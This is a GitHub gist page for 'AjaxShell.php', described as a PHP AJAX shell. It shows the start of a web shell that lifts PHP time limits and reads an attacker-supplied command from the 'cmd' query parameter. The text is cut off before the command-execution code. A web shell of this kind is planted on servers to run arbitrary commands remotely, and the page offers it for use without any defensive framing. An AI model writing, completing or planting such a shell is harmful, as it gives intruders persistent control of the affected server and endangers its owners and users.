Skip to content

Instantly share code, notes, and snippets.

View para-dise's full-sized avatar
💭
I may be slow to respond.

paradise para-dise

💭
I may be slow to respond.
View GitHub Profile
@para-dise
para-dise / AjaxShell.php
Last active September 20, 2018 11:38 — forked from lav45/AjaxShell.php
PHP AJAX Shell
<script>
var scroll = setInterval(function(){ window.scrollBy(0,1000); }, 2000); // saves having to refresh page every time shell box is too long
</script>
<?php
ini_set('max_input_time', 0);
ini_set('max_execution_time', 0);
if (!empty($_GET['cmd'])) {
$in = $_GET['cmd'];
$out = "";